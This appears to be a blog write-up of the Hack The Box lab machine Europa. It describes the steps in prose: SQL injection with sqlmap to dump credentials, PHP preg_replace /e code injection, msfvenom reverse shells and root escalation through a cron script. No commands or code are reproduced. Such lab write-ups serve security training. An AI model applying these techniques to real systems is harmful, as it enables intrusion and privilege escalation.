Saturday, February 2, 2019
Europa
EUROPA
- Layout for this exercise:
1 - INTRODUCTION
- The goal of this exercise is to develop a hacking process for the vulnerable machine Europa, what is a retired machine from the Hack The Box pentesting platform:
https://www.hackthebox.eu
2 - ENUMERATION
- Europa's IP is 10.10.10.22:
- Scanning with Nmap:
- Going deeper with the scanning:
- So there are two domains that should be added to the /etc/hosts file:
- sslyze is also able to find both domains:
- Connecting to admin.portal we have a Login form:
3 - EXPLOITATION
- The exploitation process consists of two steps:
3.1 - Database exploitation
- Let's start by exploiting with sqlmap any potential database at Europa:
- sqlmap has different options to be used, for instance:
- Launching sqlmap against Europa's administrator portal we find two databases:
- Going deeper with database admin and dumping all available information:
- Decrypting the password, what is common for both users:
- Now we can login successfully to the admin-portal console with admin's email and his password SuperSecretPassword!
3.2 - PHP code exploitation
- Once logged in, the Dashboard has got a Tools tab:
- Going to Tools we find a VPN generator script:
- Intercepting the VPN generation with Burp:
- So there is a parameter called pattern, what is used by the preg_place PHP function in this way:
- One of the modifiers is the /e feature, what has been deprecated in later versions of PHP because of its associated vulnerabilities:
- As said before, the modifier e is the origin of this vulnerability:
- Here is another interesting explanation about this vulnerability:
http://www.madirish.net/402
- So basically what modifier e does is to evaluate the subsequent string as PHP code.
- We can take advantage of this circumstance to handle the user input by adding the e modifier to the pattern parameter:
- Going to Burp and sending the input to the Repeater let's try to read /etc/passwd:
- Now, creating a shellcode with Msfvenom:
- Encoding as URL format:
- Adding to Burp request:
- Setting a listener session:
- Finally, launching the Burp Repeater we achieve a shell reverse connection:
- Improving the shell:
- The current user is www-data:
4 - CAPTURING THE 1st FLAG
- Reading user.txt:
5 - PRIVILEGE ESCALATION
- Looking at the crontab jobs, there is one task called clearlog running every minute by the user root, what can be interested to be exploited:
- Reading clearlogs:
- So what we need to do is to replace content of logcleared.sh with an exploitation code of our interest.
- By the way, logcleared.sh does not even exist at the moment, so it must be created from the scratch:
- Msfvenom comes again to our help, now using a different port than before:
- Setting a listener session at port 6666:
- Echoing the exploit to logcleared.sh:
- The script is successfully created:
- Giving running privileges:
- Now, if we don't wait the crontab time period and execute the script by ourselves it happens that the shell is run by www-data (not by root) so we have a low privilege shell:
- However, stopping the last session, launching a new one, and waiting the crontab task until logcleared.sh is run by root we finally achieve a reverse root shell:
6 - READING THE 2nd FLAG
- Reading root.txt: